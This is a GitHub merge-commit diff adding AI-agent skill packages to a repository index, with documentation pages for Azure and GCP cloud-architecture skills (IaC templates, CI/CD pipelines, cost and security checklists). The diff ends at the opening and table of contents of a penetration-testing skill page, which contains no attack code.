Merge pull request #410 from alirezarezvani/dev

Dev
This commit is contained in:
Alireza Rezvani
2026-03-25 15:09:40 +01:00
committed by GitHub
85 changed files with 30230 additions and 23 deletions

View File

@@ -3,7 +3,7 @@
"name": "claude-code-skills",
"description": "Production-ready skill packages for AI agents - Marketing, Engineering, Product, C-Level, PM, and RA/QM",
"repository": "https://github.com/alirezarezvani/claude-skills",
"total_skills": 166,
"total_skills": 174,
"skills": [
{
"name": "contract-and-proposal-writer",
@@ -209,6 +209,12 @@
"category": "engineering",
"description": "Design AWS architectures for startups using serverless patterns and IaC templates. Use when asked to design serverless architecture, create CloudFormation templates, optimize AWS costs, set up CI/CD pipelines, or migrate to AWS. Covers Lambda, API Gateway, DynamoDB, ECS, Aurora, and cost optimization."
},
{
"name": "azure-cloud-architect",
"source": "../../engineering-team/azure-cloud-architect",
"category": "engineering",
"description": "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure costs, set up Azure DevOps pipelines, or migrate to Azure. Covers AKS, App Service, Azure Functions, Cosmos DB, and cost optimization."
},
{
"name": "code-reviewer",
"source": "../../engineering-team/code-reviewer",
@@ -227,6 +233,12 @@
"category": "engineering",
"description": ">"
},
{
"name": "gcp-cloud-architect",
"source": "../../engineering-team/gcp-cloud-architect",
"category": "engineering",
"description": "Design GCP architectures for startups and enterprises. Use when asked to design Google Cloud infrastructure, deploy to GKE or Cloud Run, configure BigQuery pipelines, optimize GCP costs, or migrate to GCP. Covers Cloud Run, GKE, Cloud Functions, Cloud SQL, BigQuery, and cost optimization."
},
{
"name": "google-workspace-cli",
"source": "../../engineering-team/google-workspace-cli",
@@ -251,6 +263,12 @@
"category": "engineering",
"description": "Production-grade Playwright testing toolkit. Use when the user mentions Playwright tests, end-to-end testing, browser automation, fixing flaky tests, test migration, CI/CD testing, or test suites. Generate tests, fix flaky failures, migrate from Cypress/Selenium, sync with TestRail, run on BrowserStack. 55 templates, 3 agents, smart reporting."
},
{
"name": "security-pen-testing",
"source": "../../engineering-team/security-pen-testing",
"category": "engineering",
"description": "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security assessments. Covers static analysis, dependency scanning, secret detection, API security testing, and pen test report generation."
},
{
"name": "self-improving-agent",
"source": "../../engineering-team/self-improving-agent",
@@ -345,7 +363,7 @@
"name": "tdd-guide",
"source": "../../engineering-team/tdd-guide",
"category": "engineering",
"description": "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit. Handles test generation from source code, coverage report parsing (LCOV/JSON/XML), quality scoring, and framework conversion for TypeScript, JavaScript, Python, and Java projects."
"description": "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit."
},
{
"name": "tech-stack-evaluator",
@@ -389,6 +407,12 @@
"category": "engineering-advanced",
"description": "Autonomous experiment loop that optimizes any file by a measurable metric. Inspired by Karpathy's autoresearch. The agent edits a target file, runs a fixed evaluation, keeps improvements (git commit), discards failures (git reset), and loops indefinitely. Use when: user wants to optimize code speed, reduce bundle/image size, improve test pass rate, optimize prompts, improve content quality (headlines, copy, CTR), or run any measurable improvement loop. Requires: a target file, an evaluation command that outputs a metric, and a git repo."
},
{
"name": "browser-automation",
"source": "../../engineering/browser-automation",
"category": "engineering-advanced",
"description": "Use when the user asks to automate browser tasks, scrape websites, fill forms, capture screenshots, extract structured data from web pages, or build web automation workflows. NOT for testing \u2014 use playwright-pro for that."
},
{
"name": "changelog-generator",
"source": "../../engineering/changelog-generator",
@@ -515,6 +539,12 @@
"category": "engineering-advanced",
"description": "Runbook Generator"
},
{
"name": "secrets-vault-manager",
"source": "../../engineering/secrets-vault-manager",
"category": "engineering-advanced",
"description": "Use when the user asks to set up secret management infrastructure, integrate HashiCorp Vault, configure cloud secret stores (AWS Secrets Manager, Azure Key Vault, GCP Secret Manager), implement secret rotation, or audit secret access patterns."
},
{
"name": "skill-security-auditor",
"source": "../../engineering/skill-security-auditor",
@@ -527,6 +557,18 @@
"category": "engineering-advanced",
"description": "Skill Tester"
},
{
"name": "spec-driven-workflow",
"source": "../../engineering/spec-driven-workflow",
"category": "engineering-advanced",
"description": "Use when the user asks to write specs before code, define acceptance criteria, plan features before implementation, generate tests from specifications, or follow spec-first development practices."
},
{
"name": "sql-database-assistant",
"source": "../../engineering/sql-database-assistant",
"category": "engineering-advanced",
"description": "Use when the user asks to write SQL queries, optimize database performance, generate migrations, explore database schemas, or work with ORMs like Prisma, Drizzle, TypeORM, or SQLAlchemy."
},
{
"name": "tech-debt-tracker",
"source": "../../engineering/tech-debt-tracker",
@@ -1000,6 +1042,12 @@
"source": "../../ra-qm-team/risk-management-specialist",
"category": "ra-qm",
"description": "Medical device risk management specialist implementing ISO 14971 throughout product lifecycle. Provides risk analysis, risk evaluation, risk control, and post-production information analysis. Use when user mentions risk management, ISO 14971, risk analysis, FMEA, fault tree analysis, hazard identification, risk control, risk matrix, benefit-risk analysis, residual risk, risk acceptability, or post-market risk."
},
{
"name": "soc2-compliance",
"source": "../../ra-qm-team/soc2-compliance",
"category": "ra-qm",
"description": "Use when the user asks to prepare for SOC 2 audits, map Trust Service Criteria, build control matrices, collect audit evidence, perform gap analysis, or assess SOC 2 Type I vs Type II readiness."
}
],
"categories": {
@@ -1014,12 +1062,12 @@
"description": "Executive leadership and advisory skills"
},
"engineering": {
"count": 26,
"count": 29,
"source": "../../engineering-team",
"description": "Software engineering and technical skills"
},
"engineering-advanced": {
"count": 31,
"count": 35,
"source": "../../engineering",
"description": "Advanced engineering skills - agents, RAG, MCP, CI/CD, databases, observability"
},
@@ -1044,7 +1092,7 @@
"description": "Project management and Atlassian skills"
},
"ra-qm": {
"count": 12,
"count": 13,
"source": "../../ra-qm-team",
"description": "Regulatory affairs and quality management skills"
}

View File

@@ -0,0 +1 @@
../../engineering-team/azure-cloud-architect

View File

@@ -0,0 +1 @@
../../engineering/browser-automation

View File

@@ -0,0 +1 @@
../../engineering-team/gcp-cloud-architect

View File

@@ -0,0 +1 @@
../../engineering/secrets-vault-manager

View File

@@ -0,0 +1 @@
../../engineering-team/security-pen-testing

View File

@@ -0,0 +1 @@
../../ra-qm-team/soc2-compliance

View File

@@ -0,0 +1 @@
../../engineering/spec-driven-workflow

View File

@@ -0,0 +1 @@
../../engineering/sql-database-assistant

View File

@@ -0,0 +1,462 @@
---
title: "Azure Cloud Architect — Agent Skill & Codex Plugin"
description: "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# Azure Cloud Architect
<div class="page-meta" markdown>
<span class="meta-badge">:material-code-braces: Engineering - Core</span>
<span class="meta-badge">:material-identifier: `azure-cloud-architect`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/azure-cloud-architect/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-skills</code>
</div>
Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code templates.
---
## Workflow
### Step 1: Gather Requirements
Collect application specifications:
```
- Application type (web app, mobile backend, data pipeline, SaaS, microservices)
- Expected users and requests per second
- Budget constraints (monthly spend limit)
- Team size and Azure experience level
- Compliance requirements (GDPR, HIPAA, SOC 2, ISO 27001)
- Availability requirements (SLA, RPO/RTO)
- Region preferences (data residency, latency)
```
### Step 2: Design Architecture
Run the architecture designer to get pattern recommendations:
```bash
python scripts/architecture_designer.py \
--app-type web_app \
--users 10000 \
--requirements '{"budget_monthly_usd": 500, "compliance": ["SOC2"]}'
```
**Example output:**
```json
{
"recommended_pattern": "app_service_web",
"service_stack": ["App Service", "Azure SQL", "Front Door", "Key Vault", "Entra ID"],
"estimated_monthly_cost_usd": 280,
"pros": ["Managed platform", "Built-in autoscale", "Deployment slots"],
"cons": ["Less control than VMs", "Platform constraints", "Cold start on consumption plans"]
}
```
Select from recommended patterns:
- **App Service Web**: Front Door + App Service + Azure SQL + Redis Cache
- **Microservices on AKS**: AKS + Service Bus + Cosmos DB + API Management
- **Serverless Event-Driven**: Functions + Event Grid + Service Bus + Cosmos DB
- **Data Pipeline**: Data Factory + Synapse Analytics + Data Lake Storage + Event Hubs
See `references/architecture_patterns.md` for detailed pattern specifications.
**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
### Step 3: Generate IaC Templates
Create infrastructure-as-code for the selected pattern:
```bash
# Web app stack (Bicep)
python scripts/bicep_generator.py --arch-type web-app --output main.bicep
```
**Example Bicep output (core web app resources):**
```bicep
@description('The environment name')
param environment string = 'dev'
@description('The Azure region for resources')
param location string = resourceGroup().location
@description('The application name')
param appName string = 'myapp'
// App Service Plan
resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
name: '${environment}-${appName}-plan'
location: location
sku: {
name: 'P1v3'
tier: 'PremiumV3'
capacity: 1
}
properties: {
reserved: true // Linux
}
}
// App Service
resource appService 'Microsoft.Web/sites@2023-01-01' = {
name: '${environment}-${appName}-web'
location: location
properties: {
serverFarmId: appServicePlan.id
httpsOnly: true
siteConfig: {
linuxFxVersion: 'NODE|20-lts'
minTlsVersion: '1.2'
ftpsState: 'Disabled'
alwaysOn: true
}
}
identity: {
type: 'SystemAssigned'
}
}
// Azure SQL Database
resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
name: '${environment}-${appName}-sql'
location: location
properties: {
administrators: {
azureADOnlyAuthentication: true
}
minimalTlsVersion: '1.2'
}
}
resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
parent: sqlServer
name: '${appName}-db'
location: location
sku: {
name: 'GP_S_Gen5_2'
tier: 'GeneralPurpose'
}
properties: {
autoPauseDelay: 60
minCapacity: json('0.5')
}
}
```
> Full templates including Front Door, Key Vault, Managed Identity, and monitoring are generated by `bicep_generator.py` and also available in `references/architecture_patterns.md`.
**Bicep is the recommended IaC language for Azure.** Prefer Bicep over ARM JSON templates: Bicep compiles to ARM JSON, has cleaner syntax, supports modules, and is first-party supported by Microsoft.
### Step 4: Review Costs
Analyze estimated costs and optimization opportunities:
```bash
python scripts/cost_optimizer.py \
--config current_resources.json \
--json
```
**Example output:**
```json
{
"current_monthly_usd": 2000,
"recommendations": [
{ "action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high" },
{ "action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high" },
{ "action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium" }
],
"total_potential_savings_usd": 735
}
```
Output includes:
- Monthly cost breakdown by service
- Right-sizing recommendations
- Reserved Instance and Savings Plan opportunities
- Potential monthly savings
### Step 5: Configure CI/CD
Set up Azure DevOps Pipelines or GitHub Actions with Azure:
```yaml
# GitHub Actions — deploy Bicep to Azure
name: Deploy Infrastructure
on:
push:
branches: [main]
permissions:
id-token: write
contents: read
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: azure/login@v2
with:
client-id: ${{ secrets.AZURE_CLIENT_ID }}
tenant-id: ${{ secrets.AZURE_TENANT_ID }}
subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
- uses: azure/arm-deploy@v2
with:
resourceGroupName: rg-myapp-dev
template: ./infra/main.bicep
parameters: environment=dev
```
```yaml
# Azure DevOps Pipeline
trigger:
branches:
include:
- main
pool:
vmImage: 'ubuntu-latest'
steps:
- task: AzureCLI@2
inputs:
azureSubscription: 'MyServiceConnection'
scriptType: 'bash'
scriptLocation: 'inlineScript'
inlineScript: |
az deployment group create \
--resource-group rg-myapp-dev \
--template-file infra/main.bicep \
--parameters environment=dev
```
### Step 6: Security Review
Validate security posture before production:
- **Identity**: Entra ID (Azure AD) with RBAC, Managed Identity for service-to-service auth — never store credentials in code
- **Secrets**: Key Vault for all secrets, certificates, and connection strings
- **Network**: NSGs on all subnets, Private Endpoints for PaaS services, Application Gateway with WAF
- **Encryption**: TLS 1.2+ in transit, Azure-managed or customer-managed keys at rest
- **Monitoring**: Microsoft Defender for Cloud enabled, Azure Policy for guardrails
- **Compliance**: Azure Policy assignments for SOC 2 / HIPAA / ISO 27001 initiatives
**If deployment fails:**
1. Check the deployment status:
```bash
az deployment group show \
--resource-group rg-myapp-dev \
--name main \
--query 'properties.error'
```
2. Review Activity Log for RBAC or policy errors.
3. Validate the Bicep template before deploying:
```bash
az bicep build --file main.bicep
az deployment group validate \
--resource-group rg-myapp-dev \
--template-file main.bicep
```
**Common failure causes:**
- RBAC permission errors — verify the deploying principal has Contributor on the resource group
- Resource provider not registered — run `az provider register --namespace Microsoft.Web`
- Naming conflicts — Azure resource names are often globally unique (storage accounts, web apps)
- Quota exceeded — request quota increase via Azure Portal > Subscriptions > Usage + quotas
---
## Tools
### architecture_designer.py
Generates architecture pattern recommendations based on requirements.
```bash
python scripts/architecture_designer.py \
--app-type web_app \
--users 50000 \
--requirements '{"budget_monthly_usd": 1000, "compliance": ["HIPAA"]}' \
--json
```
**Input:** Application type, expected users, JSON requirements
**Output:** Recommended pattern, service stack, cost estimate, pros/cons
### cost_optimizer.py
Analyzes Azure resource configurations for cost savings.
```bash
python scripts/cost_optimizer.py --config resources.json --json
```
**Input:** JSON file with current Azure resource inventory
**Output:** Recommendations for:
- Idle resource removal
- VM and database right-sizing
- Reserved Instance purchases
- Storage tier transitions
- Unused public IPs and load balancers
### bicep_generator.py
Generates Bicep template scaffolds from architecture type.
```bash
python scripts/bicep_generator.py --arch-type microservices --output main.bicep
```
**Output:** Production-ready Bicep templates with:
- Managed Identity (no passwords)
- Key Vault integration
- Diagnostic settings for Azure Monitor
- Network security groups
- Tags for cost allocation
---
## Quick Start
### Web App Architecture (< $100/month)
```
Ask: "Design an Azure web app for a startup with 5000 users"
Result:
- App Service (B1 Linux) for the application
- Azure SQL Serverless for relational data
- Azure Blob Storage for static assets
- Front Door (free tier) for CDN and routing
- Key Vault for secrets
- Estimated: $40-80/month
```
### Microservices on AKS ($500-2000/month)
```
Ask: "Design a microservices architecture on Azure for a SaaS platform with 50k users"
Result:
- AKS cluster with 3 node pools (system, app, jobs)
- API Management for gateway and rate limiting
- Cosmos DB for multi-model data
- Service Bus for async messaging
- Azure Monitor + Application Insights for observability
- Multi-zone deployment
```
### Serverless Event-Driven (< $200/month)
```
Ask: "Design an event-driven backend for processing orders"
Result:
- Azure Functions (Consumption plan) for compute
- Event Grid for event routing
- Service Bus for reliable messaging
- Cosmos DB for order data
- Application Insights for monitoring
- Estimated: $30-150/month depending on volume
```
### Data Pipeline ($300-1500/month)
```
Ask: "Design a data pipeline for ingesting 10M events/day"
Result:
- Event Hubs for ingestion
- Stream Analytics or Functions for processing
- Data Lake Storage Gen2 for raw data
- Synapse Analytics for warehouse
- Power BI for dashboards
```
---
## Input Requirements
Provide these details for architecture design:
| Requirement | Description | Example |
|-------------|-------------|---------|
| Application type | What you're building | SaaS platform, mobile backend |
| Expected scale | Users, requests/sec | 10k users, 100 RPS |
| Budget | Monthly Azure limit | $500/month max |
| Team context | Size, Azure experience | 3 devs, intermediate |
| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |
**JSON Format:**
```json
{
"application_type": "saas_platform",
"expected_users": 10000,
"requests_per_second": 100,
"budget_monthly_usd": 500,
"team_size": 3,
"azure_experience": "intermediate",
"compliance": ["SOC2"],
"availability_sla": "99.9%"
}
```
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Do This Instead |
|---|---|---|
| ARM JSON templates for new projects | Verbose, hard to read, no modules | Use Bicep — compiles to ARM, cleaner syntax |
| Storing secrets in App Settings | Secrets visible in portal, no rotation | Use Key Vault references in App Settings |
| Single large AKS node pool | Cannot optimize for different workloads | Use multiple node pools: system, app, jobs |
| Public endpoints on PaaS services | Exposed attack surface | Use Private Endpoints + VNet integration |
| Over-provisioning "just in case" | Wastes budget month one | Start small, use autoscale, right-size monthly |
| Shared resource groups for everything | Blast radius, RBAC nightmares | One resource group per environment per workload |
| No tagging strategy | Cannot track costs or ownership | Tag: environment, owner, cost-center, app-name |
| Using classic resources | Deprecated, limited features | Use ARM/Bicep resources exclusively |
---
## Output Formats
### Architecture Design
- Pattern recommendation with rationale
- Service stack diagram (ASCII)
- Monthly cost estimate and trade-offs
### IaC Templates
- **Bicep**: Recommended — first-party, module support, clean syntax
- **ARM JSON**: Generated from Bicep when needed
- **Terraform HCL**: Multi-cloud compatible using azurerm provider
### Cost Analysis
- Current spend breakdown with optimization recommendations
- Priority action list (high/medium/low) and implementation checklist
---
## Reference Documentation
| Document | Contents |
|----------|----------|
| `references/architecture_patterns.md` | 5 patterns: web app, microservices/AKS, serverless, data pipeline, multi-region |
| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging, networking |
| `references/best_practices.md` | Naming conventions, tagging, RBAC, network security, monitoring, DR |

View File

@@ -0,0 +1,429 @@
---
title: "GCP Cloud Architect — Agent Skill & Codex Plugin"
description: "Design GCP architectures for startups and enterprises. Use when asked to design Google Cloud infrastructure, deploy to GKE or Cloud Run, configure. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# GCP Cloud Architect
<div class="page-meta" markdown>
<span class="meta-badge">:material-code-braces: Engineering - Core</span>
<span class="meta-badge">:material-identifier: `gcp-cloud-architect`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/gcp-cloud-architect/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-skills</code>
</div>
Design scalable, cost-effective Google Cloud architectures for startups and enterprises with infrastructure-as-code templates.
---
## Workflow
### Step 1: Gather Requirements
Collect application specifications:
```
- Application type (web app, mobile backend, data pipeline, SaaS)
- Expected users and requests per second
- Budget constraints (monthly spend limit)
- Team size and GCP experience level
- Compliance requirements (GDPR, HIPAA, SOC 2)
- Availability requirements (SLA, RPO/RTO)
```
### Step 2: Design Architecture
Run the architecture designer to get pattern recommendations:
```bash
python scripts/architecture_designer.py --input requirements.json
```
**Example output:**
```json
{
"recommended_pattern": "serverless_web",
"service_stack": ["Cloud Storage", "Cloud CDN", "Cloud Run", "Firestore", "Identity Platform"],
"estimated_monthly_cost_usd": 30,
"pros": ["Low ops overhead", "Pay-per-use", "Auto-scaling", "No cold starts on Cloud Run min instances"],
"cons": ["Vendor lock-in", "Regional limitations", "Eventual consistency with Firestore"]
}
```
Select from recommended patterns:
- **Serverless Web**: Cloud Storage + Cloud CDN + Cloud Run + Firestore
- **Microservices on GKE**: GKE Autopilot + Cloud SQL + Memorystore + Cloud Pub/Sub
- **Serverless Data Pipeline**: Pub/Sub + Dataflow + BigQuery + Looker
- **ML Platform**: Vertex AI + Cloud Storage + BigQuery + Cloud Functions
See `references/architecture_patterns.md` for detailed pattern specifications.
**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
### Step 3: Estimate Cost
Analyze estimated costs and optimization opportunities:
```bash
python scripts/cost_optimizer.py --resources current_setup.json --monthly-spend 2000
```
**Example output:**
```json
{
"current_monthly_usd": 2000,
"recommendations": [
{ "action": "Right-size Cloud SQL db-custom-4-16384 to db-custom-2-8192", "savings_usd": 380, "priority": "high" },
{ "action": "Purchase 1-yr committed use discount for GKE nodes", "savings_usd": 290, "priority": "high" },
{ "action": "Move Cloud Storage objects >90 days to Nearline", "savings_usd": 75, "priority": "medium" }
],
"total_potential_savings_usd": 745
}
```
Output includes:
- Monthly cost breakdown by service
- Right-sizing recommendations
- Committed use discount opportunities
- Sustained use discount analysis
- Potential monthly savings
Use the [GCP Pricing Calculator](https://cloud.google.com/products/calculator) for detailed estimates.
### Step 4: Generate IaC
Create infrastructure-as-code for the selected pattern:
```bash
python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1
```
**Example Terraform HCL output (Cloud Run + Firestore):**
```hcl
terraform {
required_providers {
google = {
source = "hashicorp/google"
version = "~> 5.0"
}
}
}
provider "google" {
project = var.project_id
region = var.region
}
variable "project_id" {
description = "GCP project ID"
type = string
}
variable "region" {
description = "GCP region"
type = string
default = "us-central1"
}
resource "google_cloud_run_v2_service" "api" {
name = "${var.environment}-${var.app_name}-api"
location = var.region
template {
containers {
image = "gcr.io/${var.project_id}/${var.app_name}:latest"
resources {
limits = {
cpu = "1000m"
memory = "512Mi"
}
}
env {
name = "FIRESTORE_PROJECT"
value = var.project_id
}
}
scaling {
min_instance_count = 0
max_instance_count = 10
}
}
}
resource "google_firestore_database" "default" {
project = var.project_id
name = "(default)"
location_id = var.region
type = "FIRESTORE_NATIVE"
}
```
**Example gcloud CLI deployment:**
```bash
# Deploy Cloud Run service
gcloud run deploy my-app-api \
--image gcr.io/$PROJECT_ID/my-app:latest \
--region us-central1 \
--platform managed \
--allow-unauthenticated \
--memory 512Mi \
--cpu 1 \
--min-instances 0 \
--max-instances 10
# Create Firestore database
gcloud firestore databases create --location=us-central1
```
> Full templates including Cloud CDN, Identity Platform, IAM, and Cloud Monitoring are generated by `deployment_manager.py` and also available in `references/architecture_patterns.md`.
### Step 5: Configure CI/CD
Set up automated deployment with Cloud Build or GitHub Actions:
```yaml
# cloudbuild.yaml
steps:
- name: 'gcr.io/cloud-builders/docker'
args: ['build', '-t', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA', '.']
- name: 'gcr.io/cloud-builders/docker'
args: ['push', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA']
- name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
entrypoint: gcloud
args:
- 'run'
- 'deploy'
- 'my-app-api'
- '--image=gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA'
- '--region=us-central1'
- '--platform=managed'
images:
- 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA'
```
```bash
# Connect repo and create trigger
gcloud builds triggers create github \
--repo-name=my-app \
--repo-owner=my-org \
--branch-pattern="^main$" \
--build-config=cloudbuild.yaml
```
### Step 6: Security Review
Verify security configuration:
```bash
# Review IAM bindings
gcloud projects get-iam-policy $PROJECT_ID --format=json
# Check service account permissions
gcloud iam service-accounts list --project=$PROJECT_ID
# Verify VPC Service Controls (if applicable)
gcloud access-context-manager perimeters list --policy=$POLICY_ID
```
**Security checklist:**
- IAM roles follow least privilege (prefer predefined roles over basic roles)
- Service accounts use Workload Identity for GKE
- VPC Service Controls configured for sensitive APIs
- Cloud KMS encryption keys for customer-managed encryption
- Cloud Audit Logs enabled for all admin activity
- Organization policies restrict public access
- Secret Manager used for all credentials
**If deployment fails:**
1. Check the failure reason:
```bash
gcloud run services describe my-app-api --region us-central1
gcloud logging read "resource.type=cloud_run_revision" --limit=20
```
2. Review Cloud Logging for application errors.
3. Fix the configuration or container image.
4. Redeploy:
```bash
gcloud run deploy my-app-api --image gcr.io/$PROJECT_ID/my-app:latest --region us-central1
```
**Common failure causes:**
- IAM permission errors -- verify service account roles and `--allow-unauthenticated` flag
- Quota exceeded -- request quota increase via IAM & Admin > Quotas
- Container startup failure -- check container logs and health check configuration
- Region not enabled -- enable the required APIs with `gcloud services enable`
---
## Tools
### architecture_designer.py
Recommends GCP services based on workload requirements.
```bash
python scripts/architecture_designer.py --input requirements.json --output design.json
```
**Input:** JSON with app type, scale, budget, compliance needs
**Output:** Recommended pattern, service stack, cost estimate, pros/cons
### cost_optimizer.py
Analyzes GCP resources for cost savings.
```bash
python scripts/cost_optimizer.py --resources inventory.json --monthly-spend 5000
```
**Output:** Recommendations for:
- Idle resource removal
- Machine type right-sizing
- Committed use discounts
- Storage class transitions
- Network egress optimization
### deployment_manager.py
Generates gcloud CLI deployment scripts and Terraform configurations.
```bash
python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1
```
**Output:** Production-ready deployment scripts with:
- Cloud Run or GKE deployment
- Firestore or Cloud SQL setup
- Identity Platform configuration
- IAM roles with least privilege
- Cloud Monitoring and Logging
---
## Quick Start
### Web App on Cloud Run (< $100/month)
```
Ask: "Design a serverless web backend for a mobile app with 1000 users"
Result:
- Cloud Run for API (auto-scaling, no cold start with min instances)
- Firestore for data (pay-per-operation)
- Identity Platform for authentication
- Cloud Storage + Cloud CDN for static assets
- Estimated: $15-40/month
```
### Microservices on GKE ($500-2000/month)
```
Ask: "Design a scalable architecture for a SaaS platform with 50k users"
Result:
- GKE Autopilot for containerized workloads
- Cloud SQL (PostgreSQL) with read replicas
- Memorystore (Redis) for session caching
- Cloud CDN for global delivery
- Cloud Build for CI/CD
- Multi-zone deployment
```
### Serverless Data Pipeline
```
Ask: "Design a real-time analytics pipeline for event data"
Result:
- Pub/Sub for event ingestion
- Dataflow (Apache Beam) for stream processing
- BigQuery for analytics and warehousing
- Looker for dashboards
- Cloud Functions for lightweight transforms
```
### ML Platform
```
Ask: "Design a machine learning platform for model training and serving"
Result:
- Vertex AI for training and prediction
- Cloud Storage for datasets and model artifacts
- BigQuery for feature store
- Cloud Functions for preprocessing triggers
- Cloud Monitoring for model drift detection
```
---
## Input Requirements
Provide these details for architecture design:
| Requirement | Description | Example |
|-------------|-------------|---------|
| Application type | What you're building | SaaS platform, mobile backend |
| Expected scale | Users, requests/sec | 10k users, 100 RPS |
| Budget | Monthly GCP limit | $500/month max |
| Team context | Size, GCP experience | 3 devs, intermediate |
| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |
**JSON Format:**
```json
{
"application_type": "saas_platform",
"expected_users": 10000,
"requests_per_second": 100,
"budget_monthly_usd": 500,
"team_size": 3,
"gcp_experience": "intermediate",
"compliance": ["SOC2"],
"availability_sla": "99.9%"
}
```
---
## Output Formats
### Architecture Design
- Pattern recommendation with rationale
- Service stack diagram (ASCII)
- Monthly cost estimate and trade-offs
### IaC Templates
- **Terraform HCL**: Production-ready Google provider configs
- **gcloud CLI**: Scripted deployment commands
- **Cloud Build YAML**: CI/CD pipeline definitions
### Cost Analysis
- Current spend breakdown with optimization recommendations
- Priority action list (high/medium/low) and implementation checklist
---
## Reference Documentation
| Document | Contents |
|----------|----------|
| `references/architecture_patterns.md` | 6 patterns: serverless, GKE microservices, three-tier, data pipeline, ML platform, multi-region |
| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging |
| `references/best_practices.md` | Naming, labels, IAM, networking, monitoring, disaster recovery |

View File

@@ -1,13 +1,13 @@
---
title: "Engineering - Core Skills — Agent Skills & Codex Plugins"
description: "41 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
description: "44 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
---
<div class="domain-header" markdown>
# :material-code-braces: Engineering - Core
<p class="domain-count">41 skills in this domain</p>
<p class="domain-count">44 skills in this domain</p>
</div>
@@ -29,6 +29,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud
Design scalable, cost-effective AWS architectures for startups with infrastructure-as-code templates.
- **[Azure Cloud Architect](azure-cloud-architect.md)**
---
Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code te...
- **[Code Reviewer](code-reviewer.md)**
---
@@ -53,6 +59,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud
You are now a world-class epic design expert. You build cinematic, immersive websites that feel premium and alive — u...
- **[GCP Cloud Architect](gcp-cloud-architect.md)**
---
Design scalable, cost-effective Google Cloud architectures for startups and enterprises with infrastructure-as-code t...
- **[Google Workspace CLI](google-workspace-cli.md)**
---
@@ -77,6 +89,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud
Production-grade Playwright testing toolkit for AI coding agents.
- **[Security Penetration Testing](security-pen-testing.md)**
---
Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance che...
- **[Self-Improving Agent](self-improving-agent.md)** + 5 sub-skills
---

View File

@@ -0,0 +1,861 @@
---
title: "Security Penetration Testing — Agent Skill & Codex Plugin"
description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# Security Penetration Testing
<div class="page-meta" markdown>
<span class="meta-badge">:material-code-braces: Engineering - Core</span>
<span class="meta-badge">:material-identifier: `security-pen-testing`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/security-pen-testing/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-skills</code>
</div>
Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing.
---
## Table of Contents
- [Overview](#overview)
- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit)
- [Static Analysis](#static-analysis)
- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning)
- [Secret Scanning](#secret-scanning)
